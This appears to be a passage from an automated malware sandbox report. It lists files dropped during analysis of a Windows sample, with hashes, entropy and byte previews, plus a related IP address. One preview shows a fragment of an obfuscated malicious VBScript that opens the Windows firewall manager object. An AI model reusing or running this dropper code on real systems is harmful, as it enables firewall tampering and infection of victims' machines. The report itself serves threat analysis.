                                                                                                                                              T2dvU8f2xg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              • 202.71.109.228
                                                                                                                                              oiBxz37xUo.dllGet hashmaliciousUnknownBrowse
                                                                                                                                              • 202.71.109.228

                                                                                                                                              Dropped Files

                                                                                                                                              No context

                                                                                                                                              Created / dropped Files

                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1310720
                                                                                                                                              Entropy (8bit):1.3073723150156376
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvre+:KooCEYhgYEL0Inz
                                                                                                                                              MD5:990F6838A1AFA919DA33D64816FE2E19
                                                                                                                                              SHA1:A052B3C457D2859BCEAEA321A89E99D1CC0462F6
                                                                                                                                              SHA-256:5A37239ED2D6F00B34676D6E474BECE683040DE052D1BDCB33BEA1B451796CB5
                                                                                                                                              SHA-512:BCE3212626BD69A63BF223BF1A043168C7512D03BC321D5DBAA3622E175B178A25910B0FBD63C64668198078B63EDE99C1F66D703558BEA2BA57419BD3D11A52
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x4221ec01, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1310720
                                                                                                                                              Entropy (8bit):0.42218188324983336
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO
                                                                                                                                              MD5:AFF49E51B9FAA4B78D7431809F27DC23
                                                                                                                                              SHA1:5E32F38276D836739C40EAC164695CAC94464677
                                                                                                                                              SHA-256:B65D04EB72C0C146135F6CBE28D7CDE832053A40744164D1289FFE8F0CF976A6
                                                                                                                                              SHA-512:55BAB200A515F6CDBEFD92814F5F9102C7886B17389BDB28277BCC0F03DDEAA4364236B140CE36DD81692622628B95D536625ABB69E03C4E14916357BA5490F9
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:B!..... .......A.......X\...;...{......................0.!..........{A.)....|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{................................../^Q )....|.....................&)....|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):16384
                                                                                                                                              Entropy (8bit):0.0770300477461845
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:rQEYe7h2v+05ejjn13a/1yZIvl/illcVO/lnlZMxZNQl:rz7wv+0Aj53q1KIvQOewk
                                                                                                                                              MD5:1A9B022BCA5A09BD92A59234E9F13961
                                                                                                                                              SHA1:99036147CD3C19050A7F39BBFEB1109AFA864FDB
                                                                                                                                              SHA-256:E94FC83C7F5D02D36C033F6997073E6202BC2B8350DCAF42EF932A01E1438FAC
                                                                                                                                              SHA-512:CA13661AEE038DE8F95157021FBC72451A0E984E098A0DB58775652F23216AC8133B40F7B74D60152B6575B20B5C5B6EAAB0414D1E8887BEF7E615A71A6BF44A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:>.X$.....................................;...{..)....|.......{A..............{A......{A..........{A]...................&)....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\Public\g8ix97hz.vbs

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):28001
                                                                                                                                              Entropy (8bit):5.115872767977416
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:c00yIpNNxx8wFKV6pLJ6FOgQPW25SYmpuJx:c00yIpNHx1JJqoAYmpuJx
                                                                                                                                              MD5:88D98BD2A112B408ACAEB0B875592C7A
                                                                                                                                              SHA1:C16E7B591755E996A4FAFB382453C7C8CFAFC966
                                                                                                                                              SHA-256:878054FF4E790A597A5C6F3B1F16BBDA833EEF9C09E4C4FE28D33DA8EE1255E7
                                                                                                                                              SHA-512:A05E7C3314DFD4654F484EC98B703CD6AD15F16BAB8FAFD5C279D4C38248045AB63E7684E67A302192C04F3F0685C37B634A8E951D41CCAC04D97D6B74451C42
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:....Private Const Kiloenes = &H2364..Private Const Programdiskens = &HFFFF3C0C..Private Const Reliances = -10676..Private Const Roodle = "Nonsyncopation; flibbertigibbet."..Private Const Snitsaar = "Farmerne sammensyningens"..Private Const Unsupervised = "inequitably dactylic,"..Private Const Resiling = 60139..Private Const Aarhusianerne = &HFFFF5AFB..Private Const hvidvinen = "Smidiggrelsers dispositionsnummereringernes"..Private Const solskinsdage = "certificeredes? unsmokable?"..Private Const Openness = -10018..Private Const Repay = "Paruras animeringerne65"..........Set Pranging = CreateObject("HNetCfg.FwMgr")....Set Piend = Pranging.LocalPolicy.CurrentProfile....Set Becrampon = Piend.ICMPSettings........'Unostentatiousness? unhard desorbable infinitiv; echidnehesperides........'Overwomanise130. jerngitterseng:..Function Corta ()....For I = 1566 To 84 step - 1..Hvirvelvindens = Hvirvelvindens & "Civilingeniren"..next....Rattletraps = Rattletraps & ";$Blodudwordrdningen"..'Bldsdenhe

                                                                                                                                              C:\Users\Public\rdc7di6ccs.docx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:Microsoft Word 2007+
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):13373
                                                                                                                                              Entropy (8bit):7.253207324639181
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:9DHjeCMbtQIfOOCIVVSEk9/QVgUwIqEoa:9DDNMdhCEG/+zwIx
                                                                                                                                              MD5:27820876E67CEF36E77D93C80DAC13DD
                                                                                                                                              SHA1:7ADE55E8542A6E135D9541AD06FA241BEA02CAB9
                                                                                                                                              SHA-256:CC7F57E3DC31FF56E6C8500D1678E15C0C8D356DE8E5530EF47AFF0962E5D255
                                                                                                                                              SHA-512:1694D58A6C7A49BD868CFE7749DCF1CD88DF89754FFB2AEBC297976A16656588EFF1973C475FEC3F0A6B717485C0F0E699968FBA46BCCD1A2E8E4C2975F8F740
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:PK..........!...lZ... .......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n.0.E......Ub.*..>.-R...{.V.......QU...l"%3..3V...l...w%..=...^i7+...-.d.&.0.A.6.l4...L6.0#...S.O.....X...*..V$z.3....3.......%p)O....^......5}nH".d.s.Xg.L.`....|...|.P.r.s.....?.PW...t.t4Q+..".wa...|T\y...,N....U.%...-D/......X...(.....<E....)....;.N..L?.F.........<Fk...h..y........q..i..?..l..i..1...].H.g...m.@.....m........PK..........!.........5......._rels/.rels ...(.......................................

                                                                                                                                              C:\Users\Public\~$c7di6ccs.docx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):162
                                                                                                                                              Entropy (8bit):4.697630002280752
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:/XJRozMLdEKet6xKlqDenfIS/wRwlaRCT:/XHuMLdEJSKLng7RaaRCT
                                                                                                                                              MD5:869B6EE2BBB5CDDD49102B69A6C0A58B
                                                                                                                                              SHA1:5677B862AD87728F37D22003C57E86E8DD1D7AF3
                                                                                                                                              SHA-256:3087D3A1E2EB044EAE4517527CAE5F8084570F917BE4A699B64BA2C431D4C38C
                                                                                                                                              SHA-512:A00F4FB1A3D849A893C68309C1507512C3F7F4DE0A5FCD92512011488BBAAF1442A23D5D184D7BAAD25A11A9B73F2784D09A9719AF23607BFC8D94735F206D31
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...........................................................i....nW.y...#.V..h....}..j..B..GXZ..+.n.h.c*4=P.h.v.VG;.F..m;c.h....zQ.............}.f.....U...=tf

                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):71954
                                                                                                                                              Entropy (8bit):7.996617769952133
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):328
                                                                                                                                              Entropy (8bit):3.144086598890895
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:kKwcpF9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:HpsDnLNkPlE99SNxAhUe/3
                                                                                                                                              MD5:B9CD37BF314FE3824501D40BB5A086D7
                                                                                                                                              SHA1:52C48D10AD0821C111FD40C16D49EFFD99BD1529
                                                                                                                                              SHA-256:8C5044BA5E5297F2D20679A79312B3E77663C6837D38F3A1FD9DCE7FACE9C3FE
                                                                                                                                              SHA-512:1383F05D073D2D691863CFCEFD7C4661E0A60DF200E7C967E2D9B3E6514725A00BCFEA1BDFE80D06D6615823DBBA5666AEAD92628D0E2D4E677FDE72AC441BEC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:p...... ..........QzQ..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\FontCache\4\CatalogCacheMetaData.xml

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines (1869), with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1869
                                                                                                                                              Entropy (8bit):5.089590637176602
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:cG3JFnzyr3InzysWkSyrzdnzyrXHnzyMySyKUdSyqIASyUdyDhdyBkJdyVYdyO:hF27I2sVbnd2rH2MybKUdbqIAbUEDhEQ
                                                                                                                                              MD5:D93A9692C5E5165AD4AF9E08CD42C670
                                                                                                                                              SHA1:82885E76B238B122D5A34BF123A6C72CDBC465EB
                                                                                                                                              SHA-256:B41F2C8F101F72E9776B478A4D601513C1159B42E4E437BAFF3AE5B315FF2F8C
                                                                                                                                              SHA-512:4BD49041B7F54473A921A5B84F89643F05CF1AED58648A2C7E26F2FF026637CD1308EBE6CA0FE3EE75C0C00522C30A6BD55E476E4ED702B0261AC03CB24E522A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?><root><version>1</version><Count>12</Count><Resource><Id>Aptos Display_45876482</Id><LAT>2023-10-04T10:58:38Z</LAT><key>29442803203.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Display_45876480</Id><LAT>2023-10-04T10:58:38Z</LAT><key>30264859306.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_26215426</Id><LAT>2023-10-04T10:58:38Z</LAT><key>37262344671.ttf</key><folder>Aptos Narrow</folder><type>4</type></Resource><Resource><Id>Aptos Display_26215680</Id><LAT>2024-12-18T18:26:43Z</LAT><key>23001069669.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Display_26215682</Id><LAT>2023-10-04T10:58:38Z</LAT><key>28367963232.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_45876224</Id><LAT>2023-10-04T10:58:38Z</LAT><key>24153076628.ttf</key><folder>Aptos Narrow</folder><type>4</type

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):521377
                                                                                                                                              Entropy (8bit):4.9084889265453135
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:gdTb5Sb3F2FqSrfZm+CnQsbzxZO7aYb6f5780K2:wb5q3umBnzT
                                                                                                                                              MD5:C37972CBD8748E2CA6DA205839B16444
                                                                                                                                              SHA1:9834B46ACF560146DD7EE9086DB6019FBAC13B4E
                                                                                                                                              SHA-256:D4CFBB0E8B9D3E36ECE921B9B51BD37EF1D3195A9CFA1C4586AEA200EB3434A7
                                                                                                                                              SHA-512:02B4D134F84122B6EE9A304D79745A003E71803C354FB01BAF986BD15E3BA57BA5EF167CC444ED67B9BA5964FF5922C50E2E92A8A09862059852ECD9CEF1A900
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"MajorVersion":4,"MinorVersion":40,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_40.ttf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):773040
                                                                                                                                              Entropy (8bit):6.55939673749297
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12288:Zn84XULLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/cLQ/zhm1kjFKy6Nyjbqq+:N8XPDs5+ivOXgo1kYvyz2
                                                                                                                                              MD5:4296A064B917926682E7EED650D4A745
                                                                                                                                              SHA1:3953A6AA9100F652A6CA533C2E05895E52343718
                                                                                                                                              SHA-256:E04E41C74D6C78213BA1588BACEE64B42C0EDECE85224C474A714F39960D8083
                                                                                                                                              SHA-512:A25388DDCE58D9F06716C0F0BDF2AEFA7F68EBCA7171077533AF4A9BE99A08E3DCD8DFE1A278B7AA5DE65DA9F32501B4B0B0ECAB51F9AF0F12A3A8A75363FF2C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:........... OS/29....(...`cmap.s.,.......pglyf..&....|....head2..........6hheaE.@v.......$hmtx...........@loca.U.....8...Dmaxp........... name.P+........post...<...... .........b~1_.<...........<......r......Aa...................Q....Aa....Aa.........................~...................................................3..............................MS .@.......(...Q................. ...........d...........0...J.......8.......>..........+a..#...,................................................/...K.......z...............N......*...!...-...+........z.......h..%^..3...&j..+...+%..'R..+..."....................k......$A...,.......g...&...=.......X..&........*......&....B..(B...............#.......j...............+...P...5...@...)..........#...)Q...............*...{.. ....?..'...#....N...7......<...;>.............. ]...........5......#....s.......$.......$.......^..................+...>....H.......%...7.......6.......O...V...........K......"........c...N......!...............$...&...*p..

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2278
                                                                                                                                              Entropy (8bit):3.8375578101471266
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:uiTrlKxsxxIxl9Il8u5qBzjO10fLBkeREOUxcnl9/d1rc:v0Yi5DfLBkeREZ29I
                                                                                                                                              MD5:447FDD7B0CF8668475D94F7F0B2B068F
                                                                                                                                              SHA1:482F6097D33B8888497C8AE65F896439F8DE365A
                                                                                                                                              SHA-256:A77AA728862B5FFF6507ABDACEDF0C51844EDB20BA52B0CB0546B0C7059626F1
                                                                                                                                              SHA-512:41C768C1AE2CB468B3BEACBEF0F969C93BD5AC509BCD2A3BC7451358933B76A0B4E453A2A0A681D555A07148B0FF90A47C1CD0F2FC4FF433409DFCAD79CE2BEB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.H.K.U.x.Y.J.R.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.t.N.h.i.b.p.

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2684
                                                                                                                                              Entropy (8bit):3.9045609976255884
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:uiTrlKxJxeJxl9Il8u5BfoeoAZHjwM6s5uxnqP2cR8/g6Hd/vc:99Ypfom5jwM6Yuxq+cggJ
                                                                                                                                              MD5:972F617614362BC699434DBEDB48E12E
                                                                                                                                              SHA1:1BEAA06597C6261C942665A554C1D75E49A4888D
                                                                                                                                              SHA-256:8FF76B748061F13CC53A9502315D4572B0802F00A382AD50E5121407E52EBC5B
                                                                                                                                              SHA-512:EFF4A4DE615406CA4F26F72D6AF1CE3D38F20DD47E0BE5E682D4243FAB51A3E09A371C7E6F726F7937A13A555C4702140C0130457B072A397490841C506957D5
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.H.X.L.G.R.5.H.j.D.k.3.C.i.F.b.L.a.m.K.N.+.n.c.g.T.0.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".c.x.c.6.3.U.t.w.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.t.N.h.i.b.p.

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4542
                                                                                                                                              Entropy (8bit):3.9980769287656
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:4YVpFqf7ck31Zo3Q0VXhKSnlPI8uvS4EECWMcSD:46qf4kkg09hKSKCMSD
                                                                                                                                              MD5:EC09B146338C67807A4583FD790A6BAB
                                                                                                                                              SHA1:294B6566E4994529224D649F496324C5A0AA19DA
                                                                                                                                              SHA-256:35962321965919E102A75523A5157E1D412ADC95D9035A5906D9299A83BAEB2F
                                                                                                                                              SHA-512:E1D8FB98AEE540D6574AF2C115BE2202C276E3BC5A7D5AB9529FCD49CFD79AD1CC314E61CDD3F9B1878AB549D6FA59F31166E351DA97B40A1365E7D16040791B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".L.N.m.h.q.3.p.R.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.t.N.h.i.b.p.

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{EE62613D-7E89-4D7A-B6F4-361C2F4D6F53}.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1910
                                                                                                                                              Entropy (8bit):1.0008336952751564
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:GlZQZXlFltYNQNyP4lyyiURVlPVflflJ35ll3lJ/1Pbzl1clFlLRRtaWhtugE:G0TYPqPHYAWCgE
                                                                                                                                              MD5:0FCD466DA901659D511E08C29DC4B1BE
                                                                                                                                              SHA1:9095564B3C597BD00A1D66ED21B7B7ADF20B3017
